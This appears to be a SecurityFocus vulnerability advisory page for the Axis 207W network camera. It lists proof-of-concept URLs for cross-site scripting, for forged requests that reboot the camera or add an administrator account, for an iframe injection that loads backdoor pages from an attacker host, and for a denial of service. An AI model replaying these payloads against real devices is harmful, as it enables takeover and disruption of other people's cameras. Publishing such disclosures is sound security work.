Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Axis Communications 207W Network Camera Web Interface Vulnerabilities

The following examples were provided:

Cross-site scripting:
http://www.example.com/incl/image_incl.shtml?camNo=</script><script>alert(String.fromCharCode(88,83,83))</script>

Cross-site request forgery:
1. Reboot the camera - http://www.example.com/axis-cgi/admin/restart.cgi
2. Add a new administrator -
http://www.example.com/axis-cgi/admin/pwdgrp.cgi?action=add&user=owner1&grp=axuser&sgrp=axview:axoper:axadmin&pwd=owner1&comment=WebUser&return_page=/admin/users_set.sh
+tml%3Fpageclose%3D1
3. Root the camera/add a backdoor -
http://www.example.com/admin/restartMessage.shtml?server=<iframe%20style=visibility:hidden%20src=http://www.evilserver.com/wifi/axisbd.php><iframe
src=http://www.evilserver.com/wifi/axisrb.htm><!â??

Denial of service:
http://www.example.com/axis-cgi/buffer/command.cgi?do=start&buffername=<unique buffer name>







 

Privacy Statement
Copyright 2009, SecurityFocus